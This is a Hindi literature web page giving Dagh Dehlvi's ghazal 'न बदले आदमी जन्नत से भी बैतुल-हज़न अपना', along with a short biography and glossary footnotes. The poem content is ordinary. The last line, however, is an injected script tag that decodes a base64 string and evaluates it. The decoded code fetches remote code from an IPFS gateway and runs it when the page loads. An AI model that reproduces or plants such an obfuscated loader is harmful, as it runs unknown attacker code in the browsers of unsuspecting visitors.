न बदले आदमी जन्नत से भी बैतुल-हज़न अपना -दाग़ देहलवी

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
न बदले आदमी जन्नत से भी बैतुल-हज़न अपना -दाग़ देहलवी
दाग़ देहलवी
कवि दाग़ देहलवी
जन्म 25 मई, 1831
जन्म स्थान दिल्ली
मृत्यु 1905
मृत्यु स्थान हैदराबाद
मुख्य रचनाएँ 'गुलजारे दाग़', 'महताबे दाग़', 'आफ़ताबे दाग़', 'यादगारे दाग़', 'यादगारे दाग़- भाग-2'
इन्हें भी देखें कवि सूची, साहित्यकार सूची
दाग़ देहलवी की रचनाएँ

न बदले आदमी जन्नत से भी बैतुल-हज़न[1] अपना
कि अपना घर है अपना और है अपना वतन अपना।

    जो यूँ हो वस्ल तो मिट जाए सब रंजो-महन[2] अपना
    ज़बाँ अपनी दहन[3]उनका ज़बाँ उनकी दहन अपना।

न सीधी चाल चलते हैं न सीधी बात करते हैं
दिखाते हैं वो कमज़ोरों को तन कर बाँकपन अपना।

    अजब तासीर पैदा की है वस्फ़े-नोके-मिज़गाँ[4] ने
    कि जो सुनता है उसके दिल में चुभता है सुख़न अपना।

पयामे-वस्ल[5],क़ासिद[6] की ज़बानी और फिर उनसे
ये नादानी वो नाफ़हमी[7] ये था दीवानापन अपना।

    बचा रखना जुनूँ के हाथ से ऐ बेकसो, उसको
    जो है अब पैरहन[8] अपना वही होगा क़फ़न अपना।

निगाहे-ग़म्ज़ा[9] कोई छोड़ते हैं गुलशने दिल को
कहीं इन लूटने वालों से बचता है चमन अपना।

    यह मौका मिल गया अच्छा उसे तेशा[10] लगाने का
    मुहब्बत में कहीं सर फोड़ता फिर कोहकन अपना।

जो तख़्ते-लाला-ओ-गुल के खिले वो देख लेते हैं
तो फ़रमाते हैं वो कि ‘दाग़’ का ये है ये चमन अपना


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. रहने की जगह
  2. पीड़ा
  3. मुँह
  4. विशिष्ट पलकों
  5. प्रणय-सन्देश
  6. सन्देशवाहक
  7. नासमझी
  8. वस्त्र
  9. दृष्टिपात
  10. कुल्हाड़ी

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>